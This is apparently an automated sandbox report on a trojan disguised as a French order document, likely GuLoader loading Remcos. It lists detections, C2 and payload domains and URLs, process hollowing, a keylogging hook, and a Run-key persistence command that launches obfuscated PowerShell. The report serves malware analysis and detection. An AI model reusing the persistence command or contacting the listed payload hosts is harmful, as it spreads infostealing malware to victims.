            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1431988 Sample: Commande No 00007 de M.N.S.... Startdate: 26/04/2024 Architecture: WINDOWS Score: 100 57 learfo55ozj01.duckdns.org 2->57 59 ricohltd.top 2->59 61 geoplugin.net 2->61 69 Snort IDS alert for network traffic 2->69 71 Multi AV Scanner detection for domain / URL 2->71 73 Found malware configuration 2->73 77 11 other signatures 2->77 10 Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe 2 26 2->10         started        signatures3 75 Uses dynamic DNS services 57->75 process4 file5 53 C:\Users\user\AppData\...\Pelletising.Art, ASCII 10->53 dropped 85 Suspicious powershell command line found 10->85 14 powershell.exe 20 10->14         started        signatures6 process7 file8 55 Commande No 00007 ...NS Distribution.exe, PE32 14->55 dropped 87 Obfuscated command line found 14->87 89 Writes to foreign memory regions 14->89 91 Found suspicious powershell code related to unpacking or dynamic code loading 14->91 93 Powershell drops PE file 14->93 18 wab.exe 5 15 14->18         started        23 conhost.exe 14->23         started        25 cmd.exe 1 14->25         started        signatures9 process10 dnsIp11 63 learfo55ozj01.duckdns.org 193.222.96.21, 29871, 49708, 49709 SWISSCOMSwisscomSwitzerlandLtdCH Germany 18->63 65 ricohltd.top 172.67.191.112, 443, 49707 CLOUDFLARENETUS United States 18->65 67 geoplugin.net 178.237.33.50, 49710, 80 ATOM86-ASATOM86NL Netherlands 18->67 51 C:\Users\user\AppData\Roaming\mqerms.dat, data 18->51 dropped 79 Maps a DLL or memory area into another process 18->79 81 Sample uses process hollowing technique 18->81 83 Installs a global keyboard hook 18->83 27 cmd.exe 1 18->27         started        29 wab.exe 18->29         started        31 wab.exe 18->31         started        33 11 other processes 18->33 file12 signatures13 process14 process15 35 conhost.exe 27->35         started        37 reg.exe 1 1 27->37         started        39 WerFault.exe 20 18 29->39         started        41 WerFault.exe 20 31->41         started        43 WerFault.exe 18 33->43         started        45 WerFault.exe 3 18 33->45         started        47 WerFault.exe 33->47         started        49 2 other processes 33->49

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe27%VirustotalBrowse
            Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe8%ReversingLabs
            Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe26%ReversingLabsWin32.Trojan.Guloader
            C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe27%VirustotalBrowse

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            learfo55ozj01.duckdns.org13%VirustotalBrowse
            geoplugin.net4%VirustotalBrowse
            ricohltd.top20%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://geoplugin.net/json.gp100%URL Reputationphishing
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            https://contoso.com/0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://geoplugin.net/json.gprfo20%Avira URL Cloudsafe
            http://geoplugin.net/json.gpe0%Avira URL Cloudsafe
            https://ricohltd.top/aCqwFQDQz144.bin100%Avira URL Cloudmalware
            https://ricohltd.top/aCqwFQDQz144.bin-_100%Avira URL Cloudmalware
            http://geoplugin.net/json.gpP0%Avira URL Cloudsafe
            learfo55ozj01.duckdns.org100%Avira URL Cloudmalware
            http://geoplugin.net/json.gpen0%Avira URL Cloudsafe
            https://ricohltd.top/-100%Avira URL Cloudmalware
            https://ricohltd.top/100%Avira URL Cloudmalware
            https://ricohltd.top/aCqwFQDQz144.bin18%VirustotalBrowse
            http://geoplugin.net/json.gpe0%VirustotalBrowse
            http://geoplugin.net/json.gpP0%VirustotalBrowse
            learfo55ozj01.duckdns.org13%VirustotalBrowse
            https://ricohltd.top/20%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            learfo55ozj01.duckdns.org
            		193.222.96.21
            		truetrueunknown
            geoplugin.net
            		178.237.33.50
            		truefalseunknown
            ricohltd.top
            		172.67.191.112
            		truefalseunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://geoplugin.net/json.gptrue
            • URL Reputation: phishing
            		unknown
            https://ricohltd.top/aCqwFQDQz144.binfalse
            • 18%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            learfo55ozj01.duckdns.orgtrue
            • 13%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2921973326.00000000058A4000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://nsis.sf.net/NSIS_ErrorCommande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe, Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe, 00000000.00000000.2054692266.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe, 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpfalse
                		high
                http://geoplugin.net/json.gpewab.exe, 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2906191966.0000000004996000.00000004.00000800.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2906191966.0000000004841000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://geoplugin.net/json.gprfo2wab.exe, 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2906191966.0000000004996000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://ricohltd.top/aCqwFQDQz144.bin-_wab.exe, 00000007.00000002.3324148193.0000000009A19000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://geoplugin.net/json.gpPwab.exe, 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/powershell.exe, 00000002.00000002.2921973326.00000000058A4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2921973326.00000000058A4000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Licensepowershell.exe, 00000002.00000002.2921973326.00000000058A4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://contoso.com/Iconpowershell.exe, 00000002.00000002.2921973326.00000000058A4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://nsis.sf.net/NSIS_ErrorErrorCommande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe, 00000000.00000000.2054692266.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe, 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpfalse
                        		high
                        http://geoplugin.net/json.gpenwab.exe, 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2906191966.0000000004841000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2906191966.0000000004996000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://ricohltd.top/-wab.exe, 00000007.00000002.3324148193.0000000009A56000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://ricohltd.top/wab.exe, 00000007.00000002.3324148193.0000000009A56000.00000004.00000020.00020000.00000000.sdmpfalse
                            • 20%, Virustotal, Browse
                            • Avira URL Cloud: malware
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            172.67.191.112
                            		ricohltd.topUnited States
                            		13335CLOUDFLARENETUSfalse
                            178.237.33.50
                            		geoplugin.netNetherlands
                            		8455ATOM86-ASATOM86NLfalse
                            193.222.96.21
                            		learfo55ozj01.duckdns.orgGermany
                            		3303SWISSCOMSwisscomSwitzerlandLtdCHtrue

                            General Information

                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1431988
                            Start date and time:2024-04-26 07:42:13 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 8m 53s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:45
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@57/41@4/3
                            EGA Information:
                            • Successful, ratio: 66.7%
                            HCA Information:
                            • Successful, ratio: 90%
                            • Number of executed functions: 87
                            • Number of non-executed functions: 27
                            Cookbook Comments:
                            • Found application associated with file extension: .exe

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 20.189.173.22, 20.189.173.20, 13.89.179.12
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target powershell.exe, PID 6472 because it is empty
                            • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            07:42:58API Interceptor43x Sleep call for process: powershell.exe modified
                            07:44:24AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Emraud %Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)
                            07:44:32AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Emraud %Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)
                            07:44:36API Interceptor7x Sleep call for process: WerFault.exe modified
                            07:44:56API Interceptor18x Sleep call for process: wab.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            172.67.191.112107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                              z42MNA2024000000041-KWINTMADI-11310Y_K.exeGet hashmaliciousGuLoader, RemcosBrowse
                                UMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                  178.237.33.50SHEOrder-10524.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                  • geoplugin.net/json.gp
                                  lmg1_Mlakaifa443456.vbsGet hashmaliciousAsyncRAT, DcRat, RemcosBrowse
                                  • geoplugin.net/json.gp
                                  UrgenteNotificationRef.cmdGet hashmaliciousRemcosBrowse
                                  • geoplugin.net/json.gp
                                  107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                  • geoplugin.net/json.gp
                                  URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                  • geoplugin.net/json.gp
                                  OKhCyJ619J.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                  • geoplugin.net/json.gp
                                  fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                  • geoplugin.net/json.gp
                                  1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                  • geoplugin.net/json.gp
                                  #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
                                  • geoplugin.net/json.gp
                                  TcnD64eVFK.exeGet hashmaliciousRemcosBrowse
                                  • geoplugin.net/json.gp
                                  193.222.96.21107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                    #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
                                      FINAL CMR.-Transportauftrag Nachlauf new.exeGet hashmaliciousGuLoader, RemcosBrowse
                                        04172024121853atr reteks.exeGet hashmaliciousGuLoader, RemcosBrowse
                                          z42MNA2024000000041-KWINTMADI-11310Y_K.exeGet hashmaliciousGuLoader, RemcosBrowse
                                            z14Novospedidosdecompra_Profil_4903.exeGet hashmaliciousGuLoader, RemcosBrowse
                                              UMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                Scanned Docs#U007eSHYD-231214453#U007eYD-B8243 70-30#U007eCFR#U007eDrums.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                  documents 53 ACH 775-53 ABM 912.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    MDU9342434.exeGet hashmaliciousGuLoader, RemcosBrowse

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      learfo55ozj01.duckdns.org107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 193.222.96.21
                                                      #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 193.222.96.21
                                                      FINAL CMR.-Transportauftrag Nachlauf new.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 193.222.96.21
                                                      04172024121853atr reteks.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 193.222.96.21
                                                      z42MNA2024000000041-KWINTMADI-11310Y_K.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 193.222.96.21
                                                      z14Novospedidosdecompra_Profil_4903.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 193.222.96.21
                                                      UMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 193.222.96.21
                                                      Scanned Docs#U007eSHYD-231214453#U007eYD-B8243 70-30#U007eCFR#U007eDrums.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 193.222.96.21
                                                      documents 53 ACH 775-53 ABM 912.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 193.222.96.21
                                                      MDU9342434.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 193.222.96.21
                                                      geoplugin.netSHEOrder-10524.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                      • 178.237.33.50
                                                      lmg1_Mlakaifa443456.vbsGet hashmaliciousAsyncRAT, DcRat, RemcosBrowse
                                                      • 178.237.33.50
                                                      UrgenteNotificationRef.cmdGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 178.237.33.50
                                                      URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                      • 178.237.33.50
                                                      OKhCyJ619J.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                      • 178.237.33.50
                                                      fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                      • 178.237.33.50
                                                      1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 178.237.33.50
                                                      HFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                      • 178.237.33.50
                                                      ricohltd.top107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 172.67.191.112
                                                      #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 104.21.60.38
                                                      FINAL CMR.-Transportauftrag Nachlauf new.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 104.21.60.38
                                                      04172024121853atr reteks.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 104.21.60.38
                                                      z42MNA2024000000041-KWINTMADI-11310Y_K.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 172.67.191.112
                                                      z14Novospedidosdecompra_Profil_4903.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 104.21.60.38
                                                      UMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 172.67.191.112
                                                      COPY.docGet hashmaliciousUnknownBrowse
                                                      • 104.21.60.38

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      CLOUDFLARENETUShttp://callumsyed.net/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                      • 104.17.2.184
                                                      DOC-Zcns1G_.htmlGet hashmaliciousHTMLPhisherBrowse
                                                      • 172.67.142.245
                                                      https://therufus.org/download.phpGet hashmaliciousUnknownBrowse
                                                      • 104.21.65.18
                                                      https://shorturl.at/lMOT7Get hashmaliciousUnknownBrowse
                                                      • 104.26.8.129
                                                      j1zkOQTx4q.exeGet hashmaliciousRisePro StealerBrowse
                                                      • 172.67.75.166
                                                      VoGtelkHSn.exeGet hashmaliciousLummaCBrowse
                                                      • 172.67.163.209
                                                      yX8787W7de.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 104.21.16.102
                                                      https://cdp1.tracking.e360.salesforce.com/click?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiJhMzYwL3Byb2QvNTBhMGYyODg2ZTg4NDA3Y2I1ODUwYmRjOWQwZGIxZTUiLCJjcmVhdGlvbl90aW1lIjoxNzE0MDg4MzE4LCJtZXNzYWdlX2lkIjoiMGd4dnAwdGZzeWpiNm4yamRiMDRuYWd5IzcyNWE1YTc5LTgxYzQtNGM0Yy1iNmI1LTdmMTY0MTM2ZTE2NCIsImNoYW5uZWxfdHlwZSI6ImVtYWlsIiwiZXhwIjoxNzQ1NjI0MzE4LCJyZWRpcmVjdF91cmwiOiJodHRwczovL3ZtLmJyYWRlbnRvbmNjLmluZm8vP2VvdmlldWJyJnFyYz1yZW5lZS5zY2h3YXJ0ekBxci5jb20uYXUiLCJpbmRpdmlkdWFsX2lkIjoiODdiZTY3MTdlZjJmMThjYzI3YmMyMWQ4OTJhY2Q2NzAifQ.iusDS7mld4iiq9DDY82R1MJ9ToHxmMDW3SMbDENZOZQGet hashmaliciousHTMLPhisherBrowse
                                                      • 1.1.1.1
                                                      Payment Swift.docGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.74.152
                                                      https://marinatitle.comGet hashmaliciousUnknownBrowse
                                                      • 104.17.24.14
                                                      SWISSCOMSwisscomSwitzerlandLtdCH0ar3q66pGv.elfGet hashmaliciousMiraiBrowse
                                                      • 83.77.27.163
                                                      sBgS8t0K7i.elfGet hashmaliciousMiraiBrowse
                                                      • 195.186.109.220
                                                      107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 193.222.96.21
                                                      #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 193.222.96.21
                                                      FINAL CMR.-Transportauftrag Nachlauf new.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 193.222.96.21
                                                      pGTQLD9ukH.elfGet hashmaliciousMiraiBrowse
                                                      • 176.127.118.59
                                                      ccm9HqTuky.elfGet hashmaliciousMiraiBrowse
                                                      • 199.58.40.45
                                                      04172024121853atr reteks.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 193.222.96.21
                                                      wsskM49eA3.elfGet hashmaliciousUnknownBrowse
                                                      • 164.244.193.242
                                                      42EYULJ8y1.elfGet hashmaliciousMiraiBrowse
                                                      • 62.203.127.146
                                                      ATOM86-ASATOM86NLSHEOrder-10524.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                      • 178.237.33.50
                                                      lmg1_Mlakaifa443456.vbsGet hashmaliciousAsyncRAT, DcRat, RemcosBrowse
                                                      • 178.237.33.50
                                                      UrgenteNotificationRef.cmdGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 178.237.33.50
                                                      URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                      • 178.237.33.50
                                                      OKhCyJ619J.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                      • 178.237.33.50
                                                      fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                      • 178.237.33.50
                                                      1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 178.237.33.50
                                                      TcnD64eVFK.exeGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      37f463bf4616ecd445d4a1937da06e19ad.msiGet hashmaliciousLatrodectusBrowse
                                                      • 172.67.191.112
                                                      Document_a19_79b555791-28h97348k5477-3219g9.jsGet hashmaliciousLatrodectusBrowse
                                                      • 172.67.191.112
                                                      360total.dll.dllGet hashmaliciousLatrodectusBrowse
                                                      • 172.67.191.112
                                                      ad.msiGet hashmaliciousLatrodectusBrowse
                                                      • 172.67.191.112
                                                      SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.32374.20351.xlsxGet hashmaliciousUnknownBrowse
                                                      • 172.67.191.112
                                                      SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 172.67.191.112
                                                      ProconGO1121082800.LnK.lnkGet hashmaliciousUnknownBrowse
                                                      • 172.67.191.112
                                                      file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                      • 172.67.191.112
                                                      Version.125.7599.75.jsGet hashmaliciousSocGholishBrowse
                                                      • 172.67.191.112
                                                      Database4.exeGet hashmaliciousUnknownBrowse
                                                      • 172.67.191.112

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_0d37da72-e0a4-40d1-9506-4577add39946\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.5802359423370325
                                                      Encrypted:false
                                                      SSDEEP:96:jNFmiaAKFjsQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAMf/VXT5c:h4iaAKFjk0WbkQzuiF6Z24IO8b
                                                      MD5:74C263A3DE01DCCB0118F433A5FA9C16
                                                      SHA1:1F0C2629E51CAB9B745BCA657E6ADA48137EC9C3
                                                      SHA-256:226DDD324B8F92CDE8C59D68574A9FF2DA9F4620AA8146B730CCDE14725E1806
                                                      SHA-512:D4FBD09277DFAE5CF603423F8E031F68887221FFF8348D5868D4AB8C90867886A79D682AB00CA081A0575E77FF013F4FB997B447C435BED8A1F1186C7D9DA6E5
                                                      Malicious:false
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.8.3.8.6.7.1.6.4.4.8.3.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.8.3.8.7.1.7.5.8.2.2.8.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.d.3.7.d.a.7.2.-.e.0.a.4.-.4.0.d.1.-.9.5.0.6.-.4.5.7.7.a.d.d.3.9.9.4.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.9.6.9.f.2.5.d.-.8.a.9.1.-.4.c.4.b.-.a.2.9.e.-.8.6.6.5.1.9.6.6.9.a.0.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.a.d._.m.o.d.u.l.e._.i.n.f.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.f.c.-.0.0.0.1.-.0.0.1.5.-.7.2.1.e.-.c.a.c.c.9.c.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.7.7.a.3.5.6.6.7.8.9.d.4.d.a.5.4.5.9.a.1.e.c.d.0.1.a.2.9.7.c.2.6.1.a.1.3.3.a.2.!.w.a.b...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_4cbfa5f4-55bf-47c7-8a7f-d4e5763c5b61\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.5809832805575409
                                                      Encrypted:false
                                                      SSDEEP:96:LGLFJxRAKhsQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAMf/VXT5c:Lg9RAKhk0WbkQzuiF6Z24IO8b
                                                      MD5:868A3D4E6727702261699D50A1E24DF2
                                                      SHA1:92B4FF6DA5897A90699EBF12DFC52EE773011417
                                                      SHA-256:C0CC186B1653D79E9E91A61DC44C14CF42D5A6126B6FDECE0D9AA663BA9BFA57
                                                      SHA-512:95F37810A2639624B479E1088B1C405C2BB69B8ACE39B4B36BDC827919D19E1D7A3ADBAA204BE313DC250787B46DFFFBC84081123849721CB910814C2BCE1EBF
                                                      Malicious:false
